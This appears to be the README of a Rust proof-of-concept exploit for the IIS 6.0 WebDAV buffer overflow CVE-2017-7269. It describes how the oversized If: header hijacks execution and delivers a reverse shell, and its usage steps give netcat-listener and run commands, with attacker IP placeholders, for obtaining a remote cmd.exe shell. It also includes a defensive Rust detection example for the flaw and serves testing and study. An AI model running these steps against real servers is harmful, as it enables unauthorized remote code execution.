CVE-2017-7269 - IIS 6.0 WebDAV Buffer Overflow

A Rust implementation of the POC for CVE-2017-7269, targeting the WebDAV service in Microsoft Internet Information Services (IIS) 6.0.

Vulnerability Overview

CVE-2017-7269 is a critical stack-based buffer overflow vulnerability found in the WebDAV service of Microsoft IIS 6.0, which was shipped with Windows Server 2003 R2. A successful exploit allows an unauthenticated attacker to achieve remote code execution on the target server.

Technical Details

  • Vulnerable Component: httpext.dll (IIS WebDAV Extension)
  • Vulnerable Function: ScStoragePathFromUrl
  • Trigger: A specially crafted PROPFIND HTTP request.
  • Attack Vector: An overly long If: header containing multiple URLs.

Description

The vulnerability is a classic stack buffer overflow. It is triggered when the ScStoragePathFromUrl function processes a PROPFIND request containing a malicious If: header.

This exploit crafts such a header with a long string of bytes, which overflows the buffer allocated on the stack. This overflow overwrites critical stack data, including the saved return address (EIP). The exploit hijacks the program's execution flow by pointing this return address to a small initial shellcode payload also located within the malicious header. This first-stage shellcode's job is to find and execute the main payload, a reverse shell, which is sent in the body of the same HTTP request. This POC successfully demonstrates remote code execution by connecting a cmd.exe shell back to an attacker-controlled listener.
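A defender-side check for the request shape described above, as an added example that is not code from this repository: it flags PROPFIND requests whose If: header is both oversized and contains more than one URL. The thresholds `MAX_IF_LEN` and `MAX_IF_URLS`, the `Verdict` type, and the `sample` requests (harmless filler only) are assumptions made for illustration.

```rust
// Added example: flag PROPFIND requests with an oversized, multi-URL If: header.
// MAX_IF_LEN and MAX_IF_URLS are assumed thresholds, not values from the page.
const MAX_IF_LEN: usize = 512;
const MAX_IF_URLS: usize = 1;

#[derive(Debug, PartialEq)]
pub enum Verdict {
    Clean,
    Suspicious { if_len: usize, urls: usize },
}

/// Inspect the head (request line + headers) of a raw HTTP request.
pub fn inspect(raw: &[u8]) -> Verdict {
    // Header bytes may not be valid UTF-8, so decode lossily.
    let text = String::from_utf8_lossy(raw);
    let head = text.split("\r\n\r\n").next().unwrap_or("");
    let mut lines = head.split("\r\n");
    let method = lines.next().unwrap_or("").split(' ').next().unwrap_or("");
    if !method.eq_ignore_ascii_case("PROPFIND") {
        return Verdict::Clean;
    }
    // Sum over every If: header so repeated headers are counted together.
    let (mut if_len, mut urls) = (0, 0);
    for line in lines {
        if let Some((name, value)) = line.split_once(':') {
            if name.trim().eq_ignore_ascii_case("if") {
                if_len += value.trim().len();
                urls += value.to_ascii_lowercase().matches("<http").count();
            }
        }
    }
    if if_len > MAX_IF_LEN && urls > MAX_IF_URLS {
        Verdict::Suspicious { if_len, urls }
    } else {
        Verdict::Clean
    }
}

/// Constructed sample request: two URLs padded with harmless filler bytes.
pub fn sample(filler: usize) -> Vec<u8> {
    let pad = "A".repeat(filler);
    format!(
        "PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\
         If: <http://localhost/a{0}> (<urn:x>) <http://localhost/b{0}>\r\n\r\n",
        pad
    ).into_bytes()
}

fn main() {
    for n in [4, 400] { println!("{} -> {:?}", n, inspect(&sample(n))); }
}
```

The same two conditions (method, If: header length and URL count) can be expressed as a WAF or reverse-proxy rule in front of any IIS 6.0 host that cannot be retired or have WebDAV disabled.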

Usage

  1. Start a listener
    On the attacker machine, start a netcat listener to receive the reverse shell connection.
        nc -lvnp <attacker-port>
  2. Run the exploit
    Execute the compiled binary from the target/release directory, providing the target's IP/port and your local listener's IP/port.
        cargo run -- --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  3. Get Shell
    If the target is vulnerable, you will see a connection on your netcat listener, giving you a command shell on the remote server.

Disclaimer

This tool is for educational and authorized penetration testing purposes only. Use it responsibly and only on systems you own or have explicit permission to test.